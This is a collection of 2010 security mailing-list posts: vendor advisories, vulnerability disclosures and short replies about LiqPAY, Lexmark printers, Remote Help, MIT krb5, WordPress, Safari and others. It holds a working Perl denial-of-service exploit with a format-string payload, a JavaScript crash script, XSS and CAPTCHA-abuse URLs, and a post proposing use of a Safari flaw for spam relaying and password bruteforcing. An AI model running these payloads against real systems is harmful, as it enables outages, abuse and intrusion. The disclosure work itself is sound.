Insecure SMS authorization scheme at LiqPAY micro-payments of PrivatBank (Ukraine)
1) Affected Service * LiqPAY micro-payment system from PrivatBank, Ukraine 2) Severity Rating: Moderate (need user actions) Impact: Exposure of sensitive financial information and unauthorized access to system Where: Remote (man-in-the-middle) 3) Vendor's Description of Service "LiqPAY is global open high-secure payment system that lets anyone easily send money using mobile phones, Internet and payment cards worldwide. ... LiqPAY Benefits: Strong security. Strong identification and verification using the OTP technology." Product Link: https://www.liqpay.com/?do=pages&p=productliqpay 4) Description of Vulnerability LiqPAY one-time-password technology is based on SMS messages sent to mobile phone of registered user. In order to login user has to submit his mobile phone number on web-form and will be prompted for 8-digits password from SMS message sent by system to his mobile. Vulnerability is that SMS messages are not tagged in any way that they are from LiqPAY system. SMS message text is like "Parol: 12345678 --Do not pass your password to third party.". Exploitation is following - attacker can setup web-site (or any other service) that will ask user for their mobile phone numbers first, then for password they has received. In fact, attacker is not sending SMS on his own, but request LiqPAY system to send one to user. After user will type in password he has received in SMS message on attacker website - attacker can use this password to login into LiqPAY system. After login to LiqPAY - all services of system are available to attacker - history of previous payments and sending of digital money. 5) Solution SMS messages from LiqPAY system should be tagged properly in order to allow users clearly identify service and website URL of SMS origin. Temporary solution for current users - do not answer on all SMS messages similar in format to LiqPAY one's (there 8-digit password is used). 6) Time Table 18:16 EET 22 March 2010 - Issue reported in public to vendor (Alexander Vityaz blog, Head of Center E-business at Privatbank) 18:22 - Vendor denial as non-issue 7) Credits Discovered by client of PrivatBank. 8) About LiqPay and PrivatBank The Commercial bank PrivatBank (Ukraine) was founded in 1992. Its services are used by more than 23% population of Ukraine population. PrivatBank currently serves 420 thousand corporate clients and small businesses, and over 13 million individual accounts. LiqPAY is system invented by PrivatBank company for micropayments. It is actively pushed to clients of PrivatBank. All ~3000 branches of bank issue micropayments vouchers or open accounts of LiqPAY system instead of giving change in coins to most of it's clients then bank services or wire payments are requested. Number of LiqPAY users as result of this effort claimed to be over 120 thousands.
{PRL} Lexmark Multiple Laser printer FTP Remote Denial of Services
# Application: Lexmark Multiple Laser Printer FTP Remote Denial of Services Platforms: Lexmark Multiple Laser printer Exploitation: Remote Exploitable CVE Number: CVE-2010-0618 Discover Date: 2010-01-06 Author: Francis Provencher (Protek Research Lab's) Website: http://www.protekresearchlab.com # 1) Introduction 2) Report Timeline 3) Technical details 4) Products affected 5) The Code # = 1) Introduction = Lexmark specializes in printers and printer accessories. Its current range of products includes color and monochrome laser printers and inkjet printers, both of which may include scanners (including all-in-one devices with faxing and copying capabilities and photo printers), and dot matrix printers. Lexmark was one of the first companies to release wifi inkjet printers and the very first to release printers with a web-enabled touchscreen, coming in early September of 2009. They also offer a wide variety of laser printers with software solutions for more professional printing environments. (Wikipedia) # 2) Report Timeline 2010-01-06 Vendor Contacted 2010-01-09 Vendor Response 2010-01-09 Vendor request a PoC 2010-01-10 PoC is sent to the vendor 2010-01-12 Vendor confirme they received PoC 2010-01-13 Vendor confirm the vulnerability 2010-03-22 Public release of this advisory # == 3) Technical details == Lexmark products have connection flood protection mechanisms that limit the number of simultaneous network connections that can be made to the device on most TCP service ports. (21/FTP 79/Finger, 515/LPD, 631/IPP, 5001, 9100-9104, 9200, 9300, 9400, 9500-9501 & 9600) The FTP service exception handler does not properly maintain the state of the flood protection when passive FTP connections are aborted. Once a sufficient number of passive FTP connections have timed out (typically 15), the flood protection is enabled and is never reset. The flood protection can be reset by resetting the network adapter, or by power cycling the device. # = 4) Product affected = The list is too long, you can found information on the Lexmark web site; http://support.lexmark.com/alerts # = 5) The Code = No proof of concept code are required. # (PRL-2010-02)
Re: Firefox 3.6 for Windows includes a forged CA cert
On Fri, Mar 19, 2010 at 08:22:16PM +, Francis Litterio wrote: > In Firefox 3.6 for Windows, go to Tools -> Options -> Advanced -> Encryption > -> > View Certificates -> Authorities and scroll down to the entry for "Equifax > Secure Inc." and you'll see a cert labeled "MD5 Collisions Inc > (http://www.phreedom.org/md5)" grouped with the other Equifax certs. > > Yes, it's expired, so it poses no real threat, but why is the Mozilla Project > shipping Firefox with that cert? It just causes FUD. https://bugzilla.mozilla.org/show_bug.cgi?id=471715 is the associated mozilla bug. seems intentional. Ciao, Marcus
[CORELAN-10-015] - Remote Help 0.0.7 Httpd DoS (Format String)
|--|
| __ __ |
| _ / /___ _ / / _ ___ |
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |
| \___/\/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |
| |
| http://www.corelan.be:8800 |
| secur...@corelan.be |
| |
|-[ EIP Hunters ]--|
| |
| Vulnerability Disclosure Report |
| |
|--|
Advisory: CORELAN-10-015
Disclosure date : March 20, 2010
http://www.corelan.be:8800/index.php/forum/security-advisories/remote-help-httpd-denial-of-service/
0x00 : Vulnerability information
[*] Product : RemoteHelp
[*] Version : 0.0.7
[*] Vendor : http://hipernes.sdf-eu.org/
[*] URL : http://hipernes.sdf-eu.org/
[*] URL :
http://www.softpedia.com/progDownload/Remote-Help-Download-144888.html
[*] URL : http://sourceforge.net/projects/remotehelp
[*] Platform : Windows XP
[*] Type of vulnerability : Format String
[*] Risk rating : Low/Medium
[*] Issue fixed in version : Unknown
[*] Vulnerability discovered by : Rick2600
[*] Corelan Team :
http://www.corelan.be:8800/index.php/security/corelan-team-members/
0x01 : Vendor description of software
-
>From the vendor website:
RemoteHelp is a minimal http server that allows to view and control a remote pc
running a 32-bits
version of Microsoft Windows. It is only one file without any configuration
file and now include
webcam support, new interface and new features...
0x02 : Vulnerability details
The discovered vulnerability allows an attacker to cause denial of service in
the aplication by sending a
malicious request containing format string specifier. Remote code execution may
be possible.
EAX 41424344
ECX 00E7F818
EDX
EBX 006E
ESP 00D3F2FC ASCII "0..."
EBP 00D3F550
ESI 0001
EDI 00D3FE27 ASCII "XDCBA>"
EIP 00414DFC httpd_0_.00414DFC
0x03 : Vendor communication
---
01 feb 2010 : Vendor contacted - no reply
20 mar 2010 : Public disclosure
0x04 : Exploit/PoC
--
# Exploit Title : Remote Help 0.0.7 Remote DoS
# Date : 20 Mar 2010
# Author: Rick2600 (ricks2600[at]gmail{dot}com)
# Bug found by : Rick2600
# Software Link :
http://www.softpedia.com/progDownload/Remote-Help-Download-144888.html
# Version : 0.0.7
# OS: Windows
# Tested on : XP SP2 En
# Type of vuln : DoS
# Greetz to : Corelan Security Team :
http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
# Code :
print "|--|\n";
print "| __ __ |\n";
print "| _ / /___ _ / / _ ___ |\n";
print "| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\
|\n";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n";
print "| \\___/\\/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/
|\n";
print "| |\n";
print "| http://www.corelan.be:8800 |\n";
print "| |\n";
print "|-[ EIP Hunters
]--|\n\n";
print "[+] DoS exploit for Remote Help 0.0.7 Http\n";
use IO::Socket;
if ($#ARGV != 0) {
print $#ARGV;
print "\n usage: $0 \n";
exit(0);
}
print "[+] Connecting to server $ARGV[0] on port 80\n\n";
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $ARGV[0],
PeerPort => "http(80)",
);
unless ($remote) { die "Cannot connect to Remote Help daemon on $ARGV[0]\n" }
print "[+] Connected!\n";
#CONTROL EAX
$payload = "/index.html" . "%x" x 90 . "A" x 250 . "%x" x 186 ."%.99x" x
15 ."%.19x" . "%nX" . "DCBA";
print "[+] Sending Malicious Request\n";
print $remote "GET $payload HTTP/1.1\r\n";
close $remote;
Aris AGX agXchange ESM Cross Site Scripting Vulnerability
= Yaniv Miron aka "Lament" Advisory March 12, 2010 Aris AGX agXchange ESM Cross Site Scripting Vulnerability = = I. BACKGROUND = E2B safety submissions module. When it comes to the electronic submission of safety data using the E2B format, meeting the often complicated and complex requirements from different regulatory agenciesEMEA, MHLW, FDA and other NCAscan be a challenge that consumes vast amounts of time, effort and resources. http://www.arisglobal.com/products/agxchange_esm.php = II. DESCRIPTION = A malicious attacker may inject scripts into the agXchange ESM module in the Aris AGX application. = III. ANALYSIS = Exploitation of this vulnerability results in the execution of arbitrary code using a malicious link. = IV. EXPLOIT = http://www.example.com/[agx_application]/pages/ucquerydetails.jsp?QueryID=>%22%27> = V. DISCLOSURE TIMELINE = Jan 2009 Vulnerability found Jan 2009 Vendor Notification March 2010 Public Disclosure = VI. CREDIT = Yaniv Miron aka "Lament". lam...@ilhack.org
MITKRB5-SA-2010-002 denial of service in SPNEGO [CVE-2010-0628 VU#839413]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 MITKRB5-SA-2010-002 MIT krb5 Security Advisory 2010-002 Original release: 2010-03-23 Last update: 2010-03-23 Topic: denial of service in SPNEGO CVE-2010-0628 VU#839413 denial of service in SPNEGO CVSSv2 Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C/E:POC/RL:OF/RC:C CVSSv2 Base Score: 7.8 Access Vector: Network Access Complexity: Low Authentication: None Confidentiality Impact: None Integrity Impact: None Availability Impact:Complete CVSSv2 Temporal Score: 6.1 Exploitability: Proof-of-Concept Remediation Level: Official Fix Report Confidence: Confirmed SUMMARY === In MIT krb5 releases krb5-1.7 and later, the SPNEGO GSS-API mechanism can experience an assertion failure when receiving certain invalid messages. This can cause a GSS-API application to crash. This is an implementation vulnerability in MIT krb5, and not a vulnerability in the Kerberos protocol. IMPACT == An unauthenticated remote attacker could cause a GSS-API application, including the Kerberos administration daemon (kadmind) to crash. AFFECTED SOFTWARE = * kadmind in MIT releases krb5-1.7 and later * FTP daemon in MIT releases krb5-1.7 and later * Third-party software using the GSS-API library from MIT krb5 releases krb5-1.7 and later * MIT releases prior to krb5-1.7 did not contain the vulnerable code. FIXES = * The upcoming krb5-1.7.2 and krb5-1.8.1 releases will contain fixes for this vulnerability. * Apply the patch available at http://web.mit.edu/kerberos/advisories/2010-002-patch.txt A PGP-signed patch is available at http://web.mit.edu/kerberos/advisories/2010-002-patch.txt.asc REFERENCES == This announcement is posted at: http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2010-002.txt This announcement and related security advisories may be found on the MIT Kerberos security advisory page at: http://web.mit.edu/kerberos/advisories/index.html The main MIT Kerberos web page is at: http://web.mit.edu/kerberos/index.html CVSSv2: http://www.first.org/cvss/cvss-guide.html http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2 CVE: CVE-2010-0628 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0628 CERT: VU#839413 http://www.kb.cert.org/vuls/id/839413 ACKNOWLEDGMENTS === Thanks to Nalin Dahyabhai, Jan iankko Lieskovsky, and Zbysek Mraz (all from Red Hat) for discovering and reporting this vulnerability. CONTACT === The MIT Kerberos Team security contact address is . When sending sensitive information, please PGP-encrypt it using the following key: pub 2048R/8B8DF501 2010-01-15 [expires: 2011-02-01] uid MIT Kerberos Team Security Contact DETAILS === A patch to fix CVE-2009-0845 interacted poorly with new functionality introduced in krb5-1.7. This allowed an error condition to occur where receiving an invalid packet could cause an assertion failure, crashing the program and causing denial of service. When the spnego_gss_accept_sec_context() function (in src/lib/gssapi/spnego/spnego_mech.c) receives an invalid packet during the beginning of a GSS-API protocol exchange, it can set some internal state that tells it to send an error token without first creating a context handle, but some subsequently executed code contains a call to assert() that requires that the context handle be non-null. REVISION HISTORY 2010-03-23 original release Copyright (C) 2010 Massachusetts Institute of Technology -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (SunOS) iEYEARECAAYFAkupAZsACgkQSO8fWy4vZo4ETACgn9xRUl3CTCiRd2vF1PBOaQ8b EfUAoPz32NUU/mk+H8kej8fWQFo3iwcZ =LHMP -END PGP SIGNATURE-
Vulnerabilities in WordPress
Hello Bugtraq! I want to warn you about vulnerabilities in WordPress. - Advisory: Vulnerabilities in WordPress - URL: http://websecurity.com.ua/4016/ - Timeline: 02.03.2010 - found the vulnerabilities. 02.03.2010 - didn't informed developers. After I informed WP developers about multiple vulnerabilities in WordPress in December 2007 and they ignored them - some didn't fix and some hiddenly fixed, without thanking me and referencing me (they even didn't mention about those fixed holes in release notes on official site) - starting from 2008 I never more inform them about vulnerabilities in WordPress. These holes were posted to Bugtraq (http://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded). 09.03.2010 - disclosed at my site. - Details: These are Brute Force and Insufficient Authorization vulnerabilities. Earlier in 2008 I already wrote about Brute Force vulnerability in WordPress (http://websecurity.com.ua/2007/), which was found by Kad already in 2007 (http://securityvulns.ru/Pdocument580.html). And as I found at 02.03.2010 in WordPress 2.9.2 this vulnerability still wasn't fixed. And also I found new vulnerabilities in WP. Brute Force: There is no protection from picking up of a password (from Brute Force attacks) in function of protecting pages/posts by a password. Insufficient Authorization: At every page/post in WP it's possible to set a password and these passwords can be equal. But function of accessing by a password writes global cookie, which works for the whole site. And so, after setting the password one time for one page/post, it's possible to see all protected pages/posts (with the same password, even without knowing that the password matches), because at a request to them the access will be granted automatically. Vulnerable are WordPress 2.9.2 and previous versions (all 2.x versions). I tested in different versions of WP, particularly in 2.0.11 and 2.9.2. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua
[ MDVSA-2010:065 ] cpio
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:065 http://www.mandriva.com/security/ ___ Package : cpio Date: March 23, 2010 Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 4.0, Enterprise Server 5.0, Multi Network Firewall 2.0 ___ Problem Description: A vulnerability has been found and corrected in cpio and tar: Heap-based buffer overflow in the rmt_read__ function in lib/rtapelib.c in the rmt client functionality in GNU tar before 1.23 and GNU cpio before 2.11 allows remote rmt servers to cause a denial of service (memory corruption) or possibly execute arbitrary code by sending more data than was requested, related to archive filenames that contain a : (colon) character (CVE-2010-0624). The Tar package as shipped with Mandriva Linux is not affected by this vulnerability, but it was patched nonetheless in order to provide additional security to customers who recompile the package while having the rsh package installed. Packages for 2008.0 are provided for Corporate Desktop 2008.0 customers. The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0624 ___ Updated Packages: Mandriva Linux 2008.0: 56cdfb4e12affc6594049570fb8d35ce 2008.0/i586/cpio-2.9-2.2mdv2008.0.i586.rpm 705c2df54a9920908909423da574b32d 2008.0/i586/tar-1.18-1.2mdv2008.0.i586.rpm 596789a93702aecd07562281c9d48f78 2008.0/SRPMS/cpio-2.9-2.2mdv2008.0.src.rpm b1a645b471280fa0e51c38aedfa504aa 2008.0/SRPMS/tar-1.18-1.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: d7eaf79ca34d67b5f152372813254cb1 2008.0/x86_64/cpio-2.9-2.2mdv2008.0.x86_64.rpm 2c97f01252660e80b9d00b7ebd7815e5 2008.0/x86_64/tar-1.18-1.2mdv2008.0.x86_64.rpm 596789a93702aecd07562281c9d48f78 2008.0/SRPMS/cpio-2.9-2.2mdv2008.0.src.rpm b1a645b471280fa0e51c38aedfa504aa 2008.0/SRPMS/tar-1.18-1.2mdv2008.0.src.rpm Mandriva Linux 2009.0: a3058108cddda8dde95b20b9be7d2aae 2009.0/i586/cpio-2.9-5.1mdv2009.0.i586.rpm 8af041a2f14d3ea6761eb1ec77fa4964 2009.0/i586/tar-1.20-7.1mdv2009.0.i586.rpm 93f6cecaa13c9b3495721592305e1339 2009.0/SRPMS/cpio-2.9-5.1mdv2009.0.src.rpm a755272047ac5cb179a5c294057154cd 2009.0/SRPMS/tar-1.20-7.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: ab93a4d266e37076e233aa2367a8c478 2009.0/x86_64/cpio-2.9-5.1mdv2009.0.x86_64.rpm 67ed3f23bcc8a8b633cbd8c8d7b9516b 2009.0/x86_64/tar-1.20-7.1mdv2009.0.x86_64.rpm 93f6cecaa13c9b3495721592305e1339 2009.0/SRPMS/cpio-2.9-5.1mdv2009.0.src.rpm a755272047ac5cb179a5c294057154cd 2009.0/SRPMS/tar-1.20-7.1mdv2009.0.src.rpm Mandriva Linux 2009.1: 2d0eeca73eb44a8c7e41c50fd4c20add 2009.1/i586/cpio-2.9-6.1mdv2009.1.i586.rpm 3cff4bb92b1ca2e074e1382f555bf7bc 2009.1/i586/tar-1.21-2.1mdv2009.1.i586.rpm b5be5792c0e7e74eae6c373a40dd 2009.1/SRPMS/cpio-2.9-6.1mdv2009.1.src.rpm a5ed5628ea098b1687cd432aff6adb38 2009.1/SRPMS/tar-1.21-2.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: d15356d257890237b4176c3206f03b4d 2009.1/x86_64/cpio-2.9-6.1mdv2009.1.x86_64.rpm edd4211deb588b7b649606e8585bd15a 2009.1/x86_64/tar-1.21-2.1mdv2009.1.x86_64.rpm b5be5792c0e7e74eae6c373a40dd 2009.1/SRPMS/cpio-2.9-6.1mdv2009.1.src.rpm a5ed5628ea098b1687cd432aff6adb38 2009.1/SRPMS/tar-1.21-2.1mdv2009.1.src.rpm Mandriva Linux 2010.0: bbe43728f9f8db2ceabba5dcb375e4a7 2010.0/i586/cpio-2.10-1.1mdv2010.0.i586.rpm d5f150a07bf5fb6e6918b49f80742031 2010.0/i586/tar-1.22-2.1mdv2010.0.i586.rpm f3379cc3d9787bda215d08dd56d33e3c 2010.0/SRPMS/cpio-2.10-1.1mdv2010.0.src.rpm d6f6ed62e6c1cc2bf1761408427ff0a1 2010.0/SRPMS/tar-1.22-2.1mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: 9bbaba5025e46793b44503684fe963a3 2010.0/x86_64/cpio-2.10-1.1mdv2010.0.x86_64.rpm 965f38e0f6d386e02d6a174f84871dd9 2010.0/x86_64/tar-1.22-2.1mdv2010.0.x86_64.rpm f3379cc3d9787bda215d08dd56d33e3c 2010.0/SRPMS/cpio-2.10-1.1mdv2010.0.src.rpm d6f6ed62e6c1cc2bf1761408427ff0a1 2010.0/SRPMS/tar-1.22-2.1mdv2010.0.src.rpm Corporate 4.0: f614d9c66ae80c195bff9126e1755284 corporate/4.0/i586/cpio-2.6-5.2.20060mlcs4.i586.rpm 2ab8ec94b6e698122a2965bc942f4507 corporate/4.0/i586/tar-1.15.1-5.5.20060mlcs4.i586.rpm 3ea902eef3045f53fc5731cd7d2ae9bd corporate/4.0/SRPMS/cpio-2.6-5.2.20060mlcs4.src.rpm c4eb72165f7f6e82b8fa1e61f03ae8d8 corporate/4.0/SRPMS/tar-1.15.1-5.5.20060mlcs4.src.rpm Corporate 4.0/X86_64: 459a97a9a72f94a331f71a3ab7364d73 corporate/4.0/x86_64/cpio-2.6-5.2.20060mlcs4.x86_64.rpm f6f389f792d26da8599ca3f52337bfda corporate/4.0/x86_64/tar-1.15.1-5.5.20060mlcs4.x86_64.
Vulnerabilities in CaptchaSecurityImages
Hello Bugtraq! I want to warn you about security vulnerabilities in CaptchaSecurityImages. It's captcha script which is using at many web sites and engines. - Advisory: Vulnerabilities in CaptchaSecurityImages - URL: http://websecurity.com.ua/4043/ - Timeline: 06.10.2007 - found Insufficient Anti-automation vulnerability, during conducting of my project Month of Bugs in Captchas (http://websecurity.com.ua/category/mobic/). 17.09.2009 - found Denial of Service vulnerability. 17.03.2010 - disclosed at my site. 18.03.2010 - informed developers. - Details: These are Insufficient Anti-automation and Denial of Service vulnerabilities. Insufficient Anti-automation: Parameters characters, width and height fall under manipulation in the captcha. They can be set in such way, that will allow easy bypass of the captcha via half-automated or automated (with using of OCR) methods. And in some systems (http://websecurity.com.ua/4046/) it's also possible to use session reusing with constant captcha bypass method. http://site/CaptchaSecurityImages.php?width=150&height=100&characters=2 In that way it's possible to set two characters and increase the size of the captcha. DoS: http://site/CaptchaSecurityImages.php?width=1000&height=9000 With setting of large values of width and height it's possible to create large load at the server. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua
Safari browser port blocking bypassed by integer overflow
g . o . a . t . s . e s . e . c . u . r . i . t . y g . a . p . i . n . g h . o . l . e . s e . x . p . o . s . e . d http://security.goatse.fr/ (323) 306-4576 attention: due to technical limitations, this advisory cannot be displayed correctly. to view with images and video, visit the following page: http://encyclopediadramatica.com/Safari_XPS_Attack warning: some of the content on this link may offend you and your employer. We at the Goatse Security labs have been delving into an old (but also new) class of web exploits originally coined cross-protocol scripting, but now more commonly referred to as inter-protocol exploitation. Goatse Security has a double feature for you, starting with a 0day vuln: * Safari (and other webkit-based)browser port blocking bypassed by integer overflow and a technique that, as far as I know, has not been premiered before: * XHR (XMLHttpRequest) as a vector for mail merging or wordlist attacks in XPS/IPE attacks We're going to show you how these two methods combine like Voltron into a whole much larger than its parts. At the end of this short advisory you will be able to take any Safari web browser and make it a spam drone, a wordlist-based logon cracker for networks, or a relay for payloads to arbitrary daemons. You will be able to do all of this without passing any shellcode or alerting any IDS to compromise. Let's cover the bug. First, I would like to give credit to my cat, Gary C. Berries, as the initial researcher to uncover this bug. Without my cat's assistance as an enterprise class keyboard-based integer fuzzer this vulnerability would have been left unearthed. Apple is going to learn several lessons here, the most important of which is probably not to let an unsigned short pose as anything other than an unsigned short. Open up a Safari browser on your favorite chode-sniffing operating system. Go to a "banned" port like 25 and you'll get an error: ___Not allowed to use restricted network port___ (WebKitErrorDomain:103) Add 65536 to 25 to make 65561 and revisit the site on this new port-- no such cockblocking. You're good to go. You can now use the Safari web browser as a device to hit any port on any address with a cross-protocol scripting attack. HOWTO video! http://vimeo.com/10302434 List of Webkit-based browsers found to be affected: OS X Safari iPhone/iPod Safari iPad Safari (confirmed with iPad Simulator in SDK 3.2 beta 4 w/ XCode 3.2.2) Arora iCab OmniWeb Stainless The only Webkit-based browser found to not be vulnerable: Google Chrome For all Apple's talk of "think different" the only one actually doing so in regards to browser security is Google. XSS, XPS/IPE, all the traditional methods fail against Chrome. Google, I don't even care that you are the most ruthlessly evil corporation in existence anymore. Your stuff just works. You had me sold at functional reliability. There was a time in my life that I had large concern about corporate ethics. Now I know that all corporations are evil. Some more than others. The one who is evil and smart will only ruin you with malice, where the one that is evil and stupid can ruin you out of both malice and out of sheer incompetence. To give this exploit a little of that "je ne sais quoi", we need to come up with a good attack vector. Now we're going to show you how Apple didn't just unearth a decade-old vulnerability and make it viable again a la Microsoft, it actually becomes more viable to exploit in this new generation than it was at the time of its inception. When cross-protocol scripting was born, Javascript was pretty young. There wasn't a whole lot you could do with it then--any bits of Javascript now called AJAX wouldn't be a cross-browser standard until 2004. So I looked at this integer overflow and I thought to myself what exactly I'd find this useful for. The answers I came up with were: * Getting idiot Mac-using creative people at bulk mailing companies to click on links which spew SMTP envelopes at their internal mailserver, thereby utilizing someone else's email reputation to send CPA offers of my own. * Bruteforcing device passwords via a wordlist and then phoning home * Reflashing network devices with firmware more fun than the factory default * Relay exploit payloads to non-HTTP daemons on arbitrary TCP ports * Get a Safari web browser to do pretty much anything on any TCP port and not have any current IDS/IPS in existence be any wiser for it. We summarily implemented all of these things, but I'm going to show you how to do the first one since the code is trivially altered to do many of the others. Also because it is the most fun and easy way to monetize this particular vuln, and I'm hoping other people will make use of it before Apple patches! (The best part of our first cross-protocol scripting PoC release: http://encyclopediadramatica.com/Firefox_X
Re: Vulnerability Astaro Security Linux v5
Astaro v5 has been end-of-life since October 2007. Even v6 is EOL (since October 2009). Akos -- Akos Szalkai Principal IT Consultant, CISA 2F 2000 Szamitastechnikai es Szolgaltato Kft. Tel: (+36-1)-4887700 Fax: (+36-1)-4887709 WWW: http://www.2f.hu/
[HITB-Announce] HITBSecConf2009 - Malaysia Videos Released!
The videos from the 7th annual Hack in The Box security conference held in Malaysia last year have been released! On a related note, do keep in mind that online registration for HITBSecConf2010 - Dubai closes in less than 4 weeks and the Call for Papers for HITBSecConf2010 - Amsterdam is still open for submissions (Submissions are due no later than 19th April 2010)! HITB CFP http://cfp.hackinthebox.org/ === HITB Videos http://video.hitb.org/ DL - Torrent - Day 1 http://video.hitb.org/hitbsecconf2009malaysia-day1.torrent DL - Torrent - Day 2 http://video.hitb.org/hitbsecconf2009malaysia-day2.torrent Presentation Materials http://conference.hitb.org/hitbsecconf2009kl/materials/ Keynote 1: Joe Grand (President, Grand Idea Studio) Keynote 2: Rop Gonggrijp (Hacker and Activist) Keynote 3: Ed Skoudis (Co-Founder, InGuardians) Keynote 4: Julian Assange (Founder of WikiLeaks.org) Presentations By: 1.) Alex 'kuza55' Kouzemtchenko (Associate Consultant, statsec) 2.) Alexander Gazet (Sogeti ESEC Research & Development) 3.) Andrea Barisani (Chief Security Engineer, Inverse Path) 4.) Babak Javadi (TOOOL USA) 5.) Bruno Goncalves de Oliveira (Computer Engineer, iBLISS) 6.) Chris Evans (Information Security Engineer/Troublemaker/Chrome Security, Google Corp) 7.) Damien Aumaitre (Sogeti) 8.) Daniele Bianco (Hardware Hacker, Inverse Path) 9.) Deviant Olam (TOOOL USA) 10.) Dimitrios Petropoulos (Managing Director, ENCODE Middle East) 11.) Frédéric Raynal (Head of Research & Software Development, Sogeti/Cap Gemini) 12.) Guillaume Delugré (Sogeti) 13.) Haroon Meer (Technical Director, Sensepost) 14.) Job De Haas (Riscure) 15.) Julien Tinnes (Information Security Engineer, Google Corp) 16.) Justin Lundy (Founder & CEO, Subterrain) 17.) Lee Chin Sheng (Independent Network Security Researcher) 18.) Lucas Adamski (Director, Security Engineering, Mozilla Corp) 19.) Malaysian Amateur Radio Emergency Service (MARES) 20.) Mark Dowd (ISS) 21.) Meling Mudin (Founder, security.org.my) 22.) Nguyen Anh Quynh (Researcher, Japan Institute of Advanced Industrial Science and Technology) 23.) Nishad Herath (CEO, Novologica) 24.) Paul Theriault (Consultant, SIFT) 25.) Saumil Shah (Founder, Net-Square) 26.) Sheran Gunasekera (Head of Research & Development, ZenConsult) 27.) Steve Anson (Director, Forward Discovery) 28.) Tavis Ormandy (Information Security Engineer, Google Corp) 29.) Wes Brown (Security Consultant, IOActive) 30.) Yoann Guillot (Sogeti ESEC Research & Development) --- Hafez Kamal HITB Crew Hack in The Box (M) Sdn. Bhd. Suite 26.3, Level 26, Menara IMC, No. 8 Jalan Sultan Ismail, 50250 Kuala Lumpur, Malaysia Tel: +603-20394724 Fax: +603-20318359
Re: Vulnerability Astaro Security Linux v5
Astaro Security Linux V5 is obsolete and past EOL. V5 has not been supported in years. Customers are encouraged to run current software.
Re: IE 6.0 - Local Crash Exploit
Spot the difference:
###
5QIM 2.0.0.9 IE Crash Exploit
2008-02-25 08:26
style="display:none;">
function crash() {
var buff = '';
for(i=0;i<=5000;i++) {buff+="AA";}
object = document.getElementById("xiaonei");
object.Start5QIMWithItv('test','test',buff);
}
Crash...
###
and:
On Sat, 20 Mar 2010, i...@securitylab.ir wrote:
###
# Securitylab.ir
###
Vul:
function crash() {
var buff = '';
for(i=0;i<=5000;i++) {buff+="AA";}
object = document.getElementById("opi");
object.Start5QIMWithItv('test','test',buff);
}
.!.
###
# IE 6.0 Local Crash Exploit , By: Pouya Daneshmand
(whh_i...@yahoo.com,Pouya.Securitylab.ir)
###
Yep - the date, the object name and the attribution.
http://hi.baidu.com/flyhat/blog/item/64e6a700a59c5015728b6518.html
MX Simulator Server 2010-02-06 Remote Buffer Overflow PoC
MX Simulator Server is affected by a remote stack overflow. This bug was found by Luigi Auriemma. A Proof of Concept can be found on the following link: http://www.salvatorefresta.net/files/poc/PoC-MXSimulatorServer2010-02-06.zip -- Salvatore Fresta aka Drosophila http://www.salvatorefresta.net CWNP444351
[DSECRG-09-064] SAP GUI - Insecure method, code execution
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-064 Application:SAP GUI Versions Affected: SAP GUI (SAP GUI 7.1) Vendor URL: http://SAP.com Bugs: Insecure method. Code Execution. Exploits: YES Reported: 16.10.2009 Vendor response:27.10.2009 Date of Public Advisory:23.03.2010 Author: Alexey Sintsov from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description *** Insecure method was founded in SAPBExCommonResources (class BExGlobal) activeX control component which is a part of SAP GUI. Details *** can be found inhttp://dsecrg.com/pages/vul/show.php?id=164 Fix Information *** All patches are available since December via note 1407285 References ** http://dsecrg.com/pages/vul/show.php?id=164 https://service.sap.com/sap/support/notes/1407285. About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsecrg [dot] com http://www.dsecrg.com Polyakov Alexandr. PCI QSA. Head of security audit department Head of Digital Security Research Group __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru www.dsecrg.com www.pcidss.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
Vulnerability Astaro Security Linux v5
Program : Astaro Security Linux v5
PoC : XSS
Homepage : http://www.astaro.com/
Found by : Vincent Hautot
Contact : v.hautot () sysdream com
//- Application description
Astaro Security Linux is a complete network security solution that
protects organizations against a wide range of threats to security
and productivity.
//- Description of vulnerability
This Xss was found on index.fpl page in the login form. Usig this flaw
